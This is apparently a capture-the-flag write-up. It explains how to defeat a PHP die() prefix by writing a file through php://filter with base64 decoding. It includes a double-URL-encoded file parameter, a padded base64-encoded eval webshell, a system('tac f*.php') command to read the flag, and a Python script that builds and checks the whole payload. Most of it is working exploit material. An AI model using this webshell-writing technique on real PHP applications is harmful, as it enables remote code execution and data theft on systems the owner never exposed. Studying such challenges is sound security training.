Source code:
Approach:
- Background:
- urldecode(): URL-decodes a string, turning a percent-encoded string back into its original form
- die(): terminates the script
- base64 alphabet: base64 uses only 0-9, a-z, A-Z, + and /; the convert.base64-decode filter discards every other character (its default, non-strict behaviour), so base64 can be used to neutralize the die() call and keep the script from terminating
- Note: base64 is decoded in groups of 4 characters. Because only alphabet characters survive the filter, <?php die('大佬别秀了');?> is reduced to phpdie, which is 6 characters; prepending any 2 characters from the base64 alphabet to the payload pads this to 8 (a multiple of 4), so the payload that follows decodes on a correct 4-character boundary
- Code audit: the source takes 2 parameters, file via GET and content via POST
- POST parameter: content is concatenated (with the dot operator) after the die() call, so base64 encoding can be used to bypass it and keep the script from terminating
- GET parameter: file goes through urldecode(), so file must be URL-encoded twice (PHP decodes the query string once when it parses the request, and urldecode() decodes it a second time)
Method:
Use the php://filter wrapper with write=convert.base64-decode
Steps:
- Construct the GET payload: ?file=php://filter/write=convert.base64-decode/resource=0421.php and URL-encode it twice with Burp Suite. Original payload: ?file=php://filter/write=convert.base64-decode/resource=0421.php
Double-encoded payload:
?file=%25%37%30%25%36%38%25%37%30%25%33%61%25%32%66%25%32%66%25%36%36%25%36%39%25%36%63%25%37%34%25%36%35%25%37%32%25%32%66%25%37%37%25%37%32%25%36%39%25%37%34%25%36%35%25%33%64%25%36%33%25%36%66%25%36%65%25%37%36%25%36%35%25%37%32%25%37%34%25%32%65%25%36%32%25%36%31%25%37%33%25%36%35%25%33%36%25%33%34%25%32%64%25%36%34%25%36%35%25%36%33%25%36%66%25%36%34%25%36%35%25%32%66%25%37%32%25%36%35%25%37%33%25%36%66%25%37%35%25%37%32%25%36%33%25%36%35%25%33%64%25%33%30%25%33%34%25%33%32%25%33%31%25%32%65%25%37%30%25%36%38%25%37%30
- Construct the POST payload, base64-encode it, and prepend any 2 characters from the base64 alphabet to the encoded result:
content=<?php @eval($_POST[y]);?>
content=PD9waHAgQGV2YWwoJF9QT1NUW3ldKTs/Pg==
content=aaPD9waHAgQGV2YWwoJF9QT1NUW3ldKTs/Pg==
- Visit 0421.php and send the parameter by POST. Since the webshell written above reads the POST parameter y, the POST payload is y=system('tac f*.php'); which returns the flag
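The script below is an added example, not code from the write-up or from the challenge. It builds both halves of the payload above (the double-URL-encoded file value and the padded base64 content) and, before anything is sent, checks locally that the padding is right by modelling what the server does: prepend the die() string, pass the result through a lenient base64 decode that drops non-alphabet characters (how PHP's convert.base64-decode behaves in its default non-strict mode), and confirm the decoded file ends with the intended webshell. DIE_PREFIX is assumed to be the exact string the challenge prepends, the pad character "a" is an arbitrary choice from the alphabet, and the decoder model does not reproduce PHP's exact handling of a misaligned trailing group.

```python
import base64
import re
from urllib.parse import unquote

# Assumption: the challenge prepends exactly this string to the POSTed content.
DIE_PREFIX = "<?php die('大佬别秀了');?>"
NOT_B64 = re.compile(r"[^A-Za-z0-9+/=]")


def single_urlencode(s: str) -> str:
    """Percent-encode every byte (lowercase hex), like Burp's 'encode all characters'."""
    return "".join(f"%{b:02x}" for b in s.encode())


def double_urlencode(s: str) -> str:
    """Encode twice: PHP decodes once while parsing the query string, urldecode() once more."""
    return single_urlencode(single_urlencode(s))


def urldecode_twice(s: str) -> str:
    """Reverse double_urlencode, mirroring the two decode steps on the server."""
    return unquote(unquote(s))


def filter_survivors(data: str) -> str:
    """Characters the non-strict convert.base64-decode filter keeps; everything else is dropped."""
    return NOT_B64.sub("", data)


def padding_for(prefix: str) -> int:
    """Alphabet chars to prepend so our real payload starts on a 4-character boundary."""
    return (-len(filter_survivors(prefix))) % 4   # "phpdie" is 6 long -> 2


def build_content(shell: str, prefix: str = DIE_PREFIX, pad_char: str = "a") -> str:
    """Base64-encode the webshell and prepend the padding the die() prefix requires."""
    encoded = base64.b64encode(shell.encode()).decode()
    return pad_char * padding_for(prefix) + encoded


def simulate_filter_write(content: str, prefix: str = DIE_PREFIX) -> bytes:
    """Model of file_put_contents('php://filter/write=convert.base64-decode/...', prefix . content).

    Lenient decode: non-alphabet characters are discarded, '=' is ignored, a lone trailing
    character (which cannot encode a byte) is dropped, then the stream is re-padded.
    """
    kept = filter_survivors(prefix + content).replace("=", "")
    if len(kept) % 4 == 1:
        kept = kept[:-1]
    kept += "=" * (-len(kept) % 4)
    return base64.b64decode(kept)


def build_request(shell: str, resource: str, prefix: str = DIE_PREFIX) -> dict:
    """Produce the GET 'file' value and POST 'content' value, verified against the model."""
    content = build_content(shell, prefix)
    written = simulate_filter_write(content, prefix)
    if not written.endswith(shell.encode()):
        raise ValueError("padding wrong: webshell would not survive the base64 filter")
    return {
        "file": double_urlencode(f"php://filter/write=convert.base64-decode/resource={resource}"),
        "content": content,
        "written_bytes": len(written),
    }


if __name__ == "__main__":
    req = build_request("<?php @eval($_POST[y]);?>", "0421.php")
    print("GET  ?file=" + req["file"])
    print("POST content=" + req["content"])
    print(f"{req['written_bytes']} bytes would be written; the shell is intact at the end")
```

`build_request` refuses to hand back a payload that would not survive the filter, which is the check worth running whenever the prepended string changes (a different `die`/`exit` message leaves a different number of alphabet characters and therefore needs a different amount of padding).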